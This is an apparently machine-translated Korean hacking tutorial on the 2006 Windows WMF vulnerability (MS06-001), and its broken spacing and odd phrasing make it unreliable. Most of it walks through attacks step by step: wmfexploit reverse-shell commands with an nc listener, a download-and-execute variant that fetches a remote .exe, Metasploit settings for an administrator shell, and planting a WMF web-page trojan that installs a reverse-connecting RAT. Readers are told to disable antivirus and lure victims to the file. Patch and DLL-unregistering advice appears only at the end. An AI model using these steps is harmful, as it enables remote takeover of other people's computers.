그림 으로 인 한 넘 침 위기(그림)

2006 년 에 접어 들 면서 윈도 시스템 에 심각 한 구멍 이 생 겼 다.이것 이 바로 마이크로소프트 윈도 그래 픽 렌 더 링 엔진 wmf 형식 코드 구멍(ms 0601)이다.이 구멍 은 윈도 우즈 의 그래 픽 렌 더 링 엔진 에 나타난다.해커 는 악의 적 인 wmf 파일 을 만들어 다른 사용 자 를 유인 하여 열 수 있다.시스템 이 wmf 패 치 를 업데이트 하지 않 았 을 때 해커 가 미리 설정 한 악성 코드 를 실행 하여 시스템 의 최고 권한 을 얻어 해커 의 명령 을 완전히 따 를 것 이다.구멍 이 발 표 된 지 며칠 만 에 인터넷 에서 wmf 구멍 을 이용 해 전파 되 는 바이러스,공격 사건 이 끊 이지 않 고 있 으 며,지금까지도 인터넷 에는 wmf 구멍 을 이용 한 수많은 공격 이 넘 쳐 나 고 있다.본 고 는 wmf 의 허점 에 관 한 지식 과 예방 방법 을 소개 할 것 이다.
wmf 구멍 과 관련 된 윈도 시스템 버 전이 매우 많 기 때문에 윈도 98 에서 윈도 2003 사이 의 모든 시스템 버 전 을 포함 하기 때문에 위해 가 매우 크다.현재 wmf 구멍 을 이용 한 공격 은 주로 두 가지 가 있 습 니 다.1.넘 침 공격 2.구멍 을 이용 하여 만 든 웹 페이지 목마 입 니 다.전 자 는 해커 에 게 시스템 의 최고 권한 을 주 고 후 자 는 피해자 의 컴퓨터 를 해커 의 육계 로 만 들 수 있다.해커 가 wmf 구멍 을 어떻게 이용 하 는 지 살 펴 보 자.
1.전용 넘 침 도구 사용
wmf 구멍 의 넘 침 도 구 는 구멍 이 발 표 된 지 며칠 만 에 인터넷 에 올 라 왔 습 니 다.발표 시간 이 이 르 고 결함 이 있 지만 구멍 이 있 는 호스트 를 쉽게 넘 길 수 있 습 니 다.이 넘 치 는 도 구 는 wmfexploit 라 고 합 니 다.다운로드 후 c 디스크 에 압축 을 풀 고(넘 치 는 프로그램 이 바이러스 로 인 식 될 수 있 으 므 로 테스트 시 백신 프로그램 을 닫 아야 함)'시작'→'실행'을 누 르 고'CMD'를 입력 하여'명령 프롬프트'를 실행 합 니 다."명령 프롬프트"에서 c 디스크 에 들 어가 wmfexploit 를 입력 하면 사용 설명 을 볼 수 있 습 니 다.그 넘 침 방식 은 두 가지 가 있다.1.역방향 넘 침 식 2.주동 적 으로 실행 식 을 다운로드 한다.
1.역방향 으로 넘 치고 방화벽 을 뚫 고 역방향 으로 넘 치 는 가장 큰 장점 은 방화벽 을 뚫 을 수 있다 는 것 이다.또한 wmf 구멍 의 특수성 으로 인해 구멍 스캐너 를 통 해 어느 호스트 에 구멍 이 있 는 지 확인 할 수 없 기 때문에 역방향 연결 을 사용 하여 구멍 이 있 는 호스트 가 이 기 계 를 주동 적 으로 연결 할 수 있 습 니 다."명령 프롬프트"에서 wmfexploit 를 실행 하면 역방향 으로 넘 치 는 사용 설명 을 볼 수 있 습 니 다.그 사용 방법 은 다음 과 같다.그 중에서 숫자 1 은 넘 침 방식 이 역방향 연결 임 을 나타 낸다."이 컴퓨터 의 IP 주소 와 포트 를 나타 낸다.이 역할 은 이 컴퓨터 에서 웹 서 비 스 를 열 어 목표 가 이 컴퓨터 의 악성 wmf 파일 에 접근 할 수 있 도록 하 는 것 이다.마지막""은 셸 로 되 돌아 갈 때 감청 한 IP 주소 와 포트 를 되 돌려 줍 니 다.여기 서 예 를 들 면'wmfexploit 1 192.168.0.1 777 192.168.0.1 888'이다.설정 후 리 턴,넘 침 프로그램 은 바 인 딩 성공 을 표시 합 니 다!

그림 1.역방향 연결 성공 설정
설정 이 완 료 된 후에 우 리 는'명령 프롬프트'에 들 어간 다음 에 유명한 네트워크 도구 nc 를 실행 하고 다음 명령 인'nc-vv-l-p 888'을 입력 하면 nc 는 본 컴퓨터 의 888 포트 를 감청 하기 시작 합 니 다.이어서 우 리 는 목표 가 우리 의 악의 적 인 wmf 파일 에 접근 하도록 유혹 할 수 있다.인터넷 주소'http://192.168.0.1:777/any.wmf'를 상대방 에 게 보 내 면 된다.대상 이 이 주 소 를 열 면 넘 치 는 정 보 를 묶 은 wmf 파일 을 실행 합 니 다.nc 로 감청 하 는 창 으로 돌아 가면 대상 호스트 가 성공 적 으로 넘 쳤 음 을 알 수 있 습 니 다.
그림 2.넘 치면 셸 을 얻 을 수 있 습 니 다. 
알림:앞에서 언급 한 IP 주 소 는 192.168.0.1 로 내부 네트워크 IP 에 속 합 니 다.본 컴퓨터 의 테스트 만 편리 할 뿐 대외 네트워크 의 호스트 를 테스트 하려 면 본 컴퓨터 의 내부 네트워크 IP 를 외부 네트워크 IP 로 바 꿔 야 합 니 다.
2.다운로드 실행,목 마 를 직접 실행 합 니 다.역방향 으로 넘 치 는 것 을 제외 하고 wmfexploit 는 실행 식 을 다운로드 하 는 방법 도 있 습 니 다.대상 호스트 가 악성 wmf 파일 을 실행 하면 셸 을 이 컴퓨터 가 감청 하 는 포트 에 보 내지 않 고 지정 한 사이트 에서 exe 파일 을 직접 다운로드 하여 실행 합 니 다.이 파일 은 목마 일 수도 있 고 다른 프로그램 일 수도 있 습 니 다.물론 실행 해 야 할 exe 파일 을 놓 을 웹 페이지 공간 이 필요 합 니 다.다운로드 실행 식 넘 치 는 사용 방법 보기:wmfexploit 2.숫자 2 는 넘 치 는 방식 을 다운로드 실행 식 으로 바 꾸 고 마지막 으로 exe 파일 이 있 는 주 소 를 표시 합 니 다.예 를 들 면'wmfexploit 2 192.168.0.1 777http://www.***.com/123.exe”。설정 이 완료 되면 우 리 는 nc 로 감청 할 필요 가 없습니다.사이트 주소 인'http:/192.168.0.1:777/any.wmf'를 보 내 면 됩 니 다.
2.도형 화 된 넘 침 테스트 시스템 사용
metasploit 는 유명한 넘 침 테스트 시스템 으로 현재 의 모든 넘 침 구멍 을 테스트 할 수 있 으 며 모든 넘 침 프로그램의 통합 이 라 고 할 수 있 습 니 다.물론 넘 치 는 프로그램 을 간단하게 쌓 아 두 는 것 이 아니 라 조작 하기에 편리 하고 목적 성 이 강 한 넘 치 는 테스트 플랫폼 을 제공 했다.이 테스트 시스템 의 가장 큰 장점 은 완전히 도형 화 된 조작 인 터 페 이 스 를 사용 한 것 이다.이것 은 채소 새 에 게 넘 치 는 테스트 를 하 는 데 매우 편리 하 다.설치 metasploit 를 다운로드 합 니 다.완료 후'시작'을 누 르 면 프로그램 그룹의'MSFUpdate'를 실행 합 니 다.프로그램 에'명령 프롬프트'창 이 나타 나 업데이트 할 파일 목록 을 표시 합 니 다.'yes'를 입력 하고 차 로 돌아 오 면 넘 치 는 프로그램 업 데 이 트 를 시작 할 수 있 습 니 다.업데이트 가 끝 난 후"MSFweb"을 실행 하여 이 컴퓨터 의 metasploi 탐색 서 비 스 를 시작 합 니 다.그리고 브 라 우 저 를 열 어 주소 표시 줄 에 입력 하 십시오."http://127.0.0.1:55555",metasploi 의 조작 인터페이스 를 열 수 있 습 니 다.넘 침 목록 에 있 는"Windows XP/2003/Vista Metafile Escape()SetAbortProc Code Execution"을 선택 하여 구멍 정보 인터페이스 에 들 어간 다음 맨 아래 에 있 는"0-Automatic-Windows XP/Windows 2003/Windows Vista(default)"를 클릭 하여 테스트 한 다음 이 어 나타 난"Select Payload:"옵션 에서"win 32"를 선택 하 십시오.reverse”。마지막 으로 넘 치 는 관련 정 보 를 작성 하 는 곳 에 오 면 옵션 에'HTTPHOST','HTTPPORT','LHOST','LPORT'네 가지 만 설정 하면 되 고 나머지 는 기본 값 으로 유지 된다.설정 방법 과 원 리 는 wmfexploit 와 비슷 하 므 로 더 이상 설명 하지 않 습 니 다.
그림 3.metasploit 에 넘 치 는 정 보 를 작성 합 니 다. 
마찬가지 로 악성 wmf 파일 의 주 소 를 대상 에 게 보 냅 니 다.상대방 이 넘 치면 metasploit 인터페이스 에 있 는"SESSIONS"를 누 르 면 관리자 권한 의 셸 을 얻 을 수 있 습 니 다.알림:metasploi 를 사용 하기 전에 반드시 업데이트 해 야 합 니 다.그렇지 않 으 면 wmf 구멍 과 관련 된 테스트 옵션 이 없 을 수 있 습 니 다.
3.구멍 을 이용 하여 홈 페이지 목마 만 들 기
wmf 구멍 으로 인 한 가장 큰 영향 은 인터넷 홈 페이지 목마 가 날 아 다 니 는 것 이다.백신 소프트웨어 가 이미지 파일 에 대한 검 측 기능 이 강하 지 않 기 때문에 wmf 구멍 을 이용 해 만 든 홈 페이지 목 마 는 쉽게 성공 할 수 있 고 최근 홈 페이지 목마 의 주인공 이 되 었 다.다음은 wmf 홈 페이지 목마 제작 에 대해 알 아 보 겠 습 니 다.우선 우 리 는 목마 프로그램 을 준비 해 야 한다.회색 비둘기 와 같은 반등 연결 형 목 마 를 추천 한다.그러면 목표 가 넘 칠 때 목 마 를 통 해 우리 의 호스트 를 주동 적 으로 연결 하고 우리 가 주동 적 으로 연결 하지 않 아 도 육계 에 대한 관 리 를 편리 하 게 할 수 있다.그리고 설 치 된 목마 프로그램 서버 를 웹 페이지 공간 에 배치 합 니 다(무료 공간 을 신청 하여 저장 할 수 있 습 니 다).wmf 목마 제작 프로그램 ms 0601 다운로드.다운로드 완료 후'명령 프롬프트'에서 실행 하면 사용 방법 이 간단 합 니 다.ms 0601[THE URL OF EXEFILE],목마 파일 이 있 는 인터넷 주 소 를 직접 입력 하면 됩 니 다.돌아 오 면 같은 디 렉 터 리 아래 에 exploit.wmf 파일 을 만 들 수 있 습 니 다.이 wmf 파일 을 실행 하면 넘 치고 웹 페이지 에서 목마 파일 을 자동 으로 다운로드 하여 실 행 됩 니 다.웹 공간 에 exploit.wmf 파일 을 업로드 합 니 다.마지막 으로 우 리 는 사이트 홈 페이지 의 소스 코드 에 다음 과 같은 코드 를 삽입 해 야 한다.이렇게 하면 다른 사람 이 홈 페이지 에 접근 할 때 새로운 브 라 우 저 창 이 뜨 지 않 고 exploit.wmf 를 직접 실행 하여 넘 칩 니 다.
구멍 을 메우다
wmf 구멍 발표 시간 이 늦 어 인터넷 에는 패 치 를 제대로 하지 못 한 시스템 이 많다.넘 치 든 홈 페이지 목마 든 성 공률 이 높 아 바이러스 와 목마 의 전파 에 도 경 로 를 제공 했다.해커 가 wmf 구멍 을 어떻게 이용 하 는 지 알 게 된 후,우 리 는 어떻게 해야만 구멍 을 메 울 수 있 는 지,wmf 구멍 을 이용 한 웹 페이지 목 마 를 예방 할 수 있 는 지 다시 한 번 살 펴 보 자.
1.미등 록 dll 파일 은 Windows Picture 를 사용 하여 악성 wmf 파일 을 볼 때 넘 침 이 발생 하기 때문에 시스템 패 치 를 하기 불편 하면 먼저 Windows Picture 의 dll 파일 Shimgvw.dll 을 미등 록 해 볼 수 있 습 니 다.미등 록 후 Windows Picture 는 다시 실행 할 수 없고 넘 침 도 존재 하지 않 습 니 다.반 등록 방법 은"시작"→"실행"을 누 르 고"regsvr 32-u%windir%/system 32/shimgvw.dll"을 입력 하면 됩 니 다.Windows Picture 를 다시 사용 하려 면'regsvr 32%windir%/system 32/shimgvw.dll'을 입력 하여 다시 등록 할 수 있 습 니 다.
그림 4.반 등록 Shimgvw.dll 
2.구멍 패 치 를 사용 하여 현재 마이크로소프트 에서 이 구멍 패 치 프로그램 을 발 표 했 습 니 다.다운로드 주소:http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx이것 은 가장 철저 하고 가장 안전 한 수리 방식 이다.마이크로소프트 가 제공 하 는 시스템 패 치 를 하기 불편 하면 제3자 가 만 든 패 치 프로그램 을 추천 할 수 있 습 니 다.
3.알 수 없 는 그림 파일 을 경계 하 십시오.악의 적 인 wmf 파일 이 웹 공간 에 있 으 면 저 희 는 이 악의 적 인 wmf 파일 을 방문 할 때 서로 다른 상황 이 발생 할 수 있 습 니 다.Win 2000 은 주로 다운로드 알림 상자 가 나타 나 wmf 파일 을 다운로드 하 라 고 요구 하 는 것 으로 나 타 났 습 니 다.반면 WinXP 와 Win 2003 은 Windows 이미지 뷰 어가 팝 업 되 고 그림 의 내용 은 표시 되 지 않 습 니 다.이런 상황 에 부 딪 혔 을 때,우 리 는 조심해 야 한다.아마도 이 wmf 파일 에 넘 치 는 정보 가 있 을 것 이다.물론 wmf 가 접미사 인 그림 파일 만 넘 칠 수 있 는 것 은 아 닙 니 다.jpg,bmp 등 그림 형식 은 구 조 를 거치 면 넘 칠 수 있 습 니 다.따라서 우 리 는 미 확인 사진 에 대해 더욱 조심해 야 한다.해커 는 종종 악성 사진 파일 에 매력 적 인 이름 을 지어 다른 사람 을 유인 하여 열 게 한다.
악성 wmf 파일 을 열 때의 표현 
이 밖 에 백신 소프트웨어 를 업그레이드 하 는 것 은 필수 적 이 며,최신 백신 소프트웨어 바이러스 라 이브 러 리 는 모두 악성 wmf 파일 을 바이러스 로 분류 했다.